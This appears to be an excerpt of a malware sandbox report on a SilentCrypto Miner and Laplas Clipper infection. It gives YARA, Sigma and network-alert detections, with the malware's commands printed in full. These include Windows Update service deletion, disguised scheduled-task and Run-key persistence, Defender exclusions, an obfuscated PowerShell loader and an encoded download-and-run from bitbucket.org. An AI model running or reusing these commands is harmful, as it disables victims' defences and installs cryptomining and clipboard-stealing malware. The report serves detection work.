00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SilentCryptoMiner | Yara detected SilentCrypto Miner | Joe Security
00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmp | JoeSecurity_SilentCryptoMiner | Yara detected SilentCrypto Miner | Joe Security
00000023.00000002.2992259011.0000000000B4A000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_LaplasClipper | Yara detected Laplas Clipper | Joe Security
00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp | JoeSecurity_SilentCryptoMiner | Yara detected SilentCrypto Miner | Joe Security
(the report lists 5 entries)

Unpacked PEs
Source | Rule | Description | Author
37.2.dialer.exe.7ff790dc0000.0.unpack | JoeSecurity_SilentCryptoMiner | Yara detected SilentCrypto Miner | Joe Security
40.2.powershell.exe.1c51e800000.0.unpack | JoeSecurity_SilentCryptoMiner | Yara detected SilentCrypto Miner | Joe Security
7.2.LicSend.exe.7ff7d3ba5900.2.unpack | JoeSecurity_SilentCryptoMiner | Yara detected SilentCrypto Miner | Joe Security
37.2.dialer.exe.7ff790dc60b0.1.unpack | JoeSecurity_SilentCryptoMiner | Yara detected SilentCrypto Miner | Joe Security
40.2.powershell.exe.1c52eb9aeb0.7.raw.unpack | JoeSecurity_SilentCryptoMiner | Yara detected SilentCrypto Miner | Joe Security
(the report lists 9 entries, 5 shown here)

AMSI buffers
Source | Rule | Description | Author
amsi64_7520.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

Operating System Destruction

Source: Process started
Author: Joe Security
Data:
  Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  CommandLine: (identical to Command)
  CommandLine|base64offset|contains: (empty)
  Image: C:\Windows\System32\cmd.exe
  NewProcessName: C:\Windows\System32\cmd.exe
  OriginalFileName: C:\Windows\System32\cmd.exe
  ParentCommandLine: (empty)
  ParentImage: (empty)
  ParentProcessId: 2580
  ProcessCommandLine: (identical to Command)
  ProcessId: 5460
  ProcessName: cmd.exe

System Summary

Source: Process started
Author: Jonathan Cheong, oscd.community
Data:
  Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  CommandLine: (identical to Command)
  CommandLine|base64offset|contains: [
  Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: (empty)
  ParentImage: (empty)
  ParentProcessId: 2580
  ProcessCommandLine: (repeats Command; cut off in this copy after "-Execu")
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
                        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:NGLbonfBsuNR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QtvYIpWnFCFICq,[Parameter(Position=1)][Type]$hhlNOVEDYw)$dpttUeHYiSd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'em'+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'yD'+'e'+'l'+[Char](101)+''+'g'+'at'+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+'ale'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'i'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dpttUeHYiSd.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+[Char](72)+'ide'+'B'+'y'+'S'+''+'i'+''+[Char](103)+''+','+'P'+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QtvYIpWnFCFICq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$dpttUeHYiSd.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char
](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+'g'+[Char](44)+'N'+'e'+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$hhlNOVEDYw,$QtvYIpWnFCFICq).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $dpttUeHYiSd.CreateType();}$fxvCjurJEEUcT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'o'+'f'+'t'+'.'+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'f'+'x'+''+[Char](118)+'C'+[Char](106)+''+'u'+''+[Char](114)+''+[Char](74)+''+[Char](69)+''+[Char](
                        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:NGLbonfBsuNR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QtvYIpWnFCFICq,[Parameter(Position=1)][Type]$hhlNOVEDYw)$dpttUeHYiSd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'em'+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'yD'+'e'+'l'+[Char](101)+''+'g'+'at'+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+'ale'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'i'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dpttUeHYiSd.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+[Char](72)+'ide'+'B'+'y'+'S'+''+'i'+''+[Char](103)+''+','+'P'+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QtvYIpWnFCFICq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$dpttUeHYiSd.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'
+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+'g'+[Char](44)+'N'+'e'+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$hhlNOVEDYw,$QtvYIpWnFCFICq).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $dpttUeHYiSd.CreateType();}$fxvCjurJEEUcT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'o'+'f'+'t'+'.'+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'f'+'x'+''+[Char](118)+'C'+[Char](106)+''+'u'+''+[Char](114)+''+[Char](74)+''+[Char](69)+''+[Char](
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcgB4ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdQBzACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUALwBTAGUAcgB2AGUAcgAgAGkAcwAgAGEAbABsAG8AdwBlAGQAIQAgAFQAcgB5ACAAcgB1AG4AbgBpAG4AZwAgAG8AbgAgAGEAIABkAGkAZgBmAGUAcgBlAG4AdAAgAGQAZQB2AGkAYwBlACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAawBrACMAPgA7ACIAOwA8ACMAZQBmAHIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHAAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBuAHoAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAHEAZAAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvADUAOQA0ADAAagBnADkAOAAzADQALwBnAGYAMwA0ADQAMwBmADMALwByAGEAdwAvADAAYQBkAGYAYQBlAGYANABmADgANAA3AGEAMQA3AGUAYQA0AGUANABmADYANQA2AGQAYwBkADgANQBlADcANgAyADkAMwA3ADgAMABlAGQALwBEAC4AZQB4AGUAJwAsACAAPAAjAHAAagB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBjAHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBjAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQApADwAIwBiAGcAawAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAG8AcgBnAC8AcgBlA
GMAaABlAGEAdABzAGQAaQByAGUAYwB0AC8AcgBhAHcALwAwADAAZQBiADIAZAAwAGIANAAzADYANQA5ADEAZgBjAGUAMQAxADUAMwBiAGEAYwBhADcANgAyADUAMAA5AGUANwA2ADIAZgAyAGMAZQA0AC8AQwBMAFAALgBlAHgAZQAnACwAIAA8ACMAcwBiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHEAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBrAHcAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBDAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAawBpAHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBkAGkAcgBlAGMAdAAvAHIAYQB3AC8AMAAwAGUAYgAyAGQAMABiADQAMwA2ADUAOQAxAGYAYwBlADEAMQA1ADMAYgBhAGMAYQA3ADYAMgA1ADAAOQBlADcANgAyAGYAMgBjAGUANAAvAEQAZQB2AG0AaQBuAC4AZQB4AGUAJwAsACAAPAAjAGQAdQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABoAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdQBzAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAUwBlAG4AZAAuAGUAeABlACcAKQApADwAIwBoAHcAbgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBz
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 
'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execu
                        Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 8052, ProcessName: powershell.exe
                        Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\LicCheck.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\LicCheck.exe, ParentProcessId: 7932, ParentProcessName: LicCheck.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f, ProcessId: 7768, ProcessName: schtasks.exe
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
                        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 
'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execu
                        Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\LicCheck.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\LicCheck.exe, ParentProcessId: 7932, ParentProcessName: LicCheck.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f, ProcessId: 7768, ProcessName: schtasks.exe
                        Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{096b6fe7-1e57-4538-901c-c68ea60d3345}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 8168, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
                        Timestamp                        SID      Severity  Classtype                      Source IP    Source Port  Destination IP  Destination Port  Protocol
                        2024-10-04T19:13:59.781016+0200  2039775  1         A Network Trojan was detected  192.168.2.4  49739        45.159.189.105  80                TCP
                        2024-10-04T19:14:57.437285+0200  2039775  1         A Network Trojan was detected  192.168.2.4  50007        45.159.189.105  80                TCP
                        2024-10-04T19:14:01.488048+0200  2039776  1         A Network Trojan was detected  192.168.2.4  49740        45.159.189.105  80                TCP
                        2024-10-04T19:14:59.158697+0200  2039776  1         A Network Trojan was detected  192.168.2.4  50008        45.159.189.105  80                TCP
                        2024-10-04T19:13:18.950746+0200  2018581  1         A Network Trojan was detected  192.168.2.4  49730        185.166.143.49  443               TCP
                        2024-10-04T19:13:20.612319+0200  2803305  3         Unknown Traffic                192.168.2.4  49731        185.166.143.49  443               TCP
                        2024-10-04T19:13:22.132122+0200  2803305  3         Unknown Traffic                192.168.2.4  49732        185.166.143.49  443               TCP
                        2024-10-04T19:13:59.781016+0200  2803304  3         Unknown Traffic                192.168.2.4  49739        45.159.189.105  80                TCP
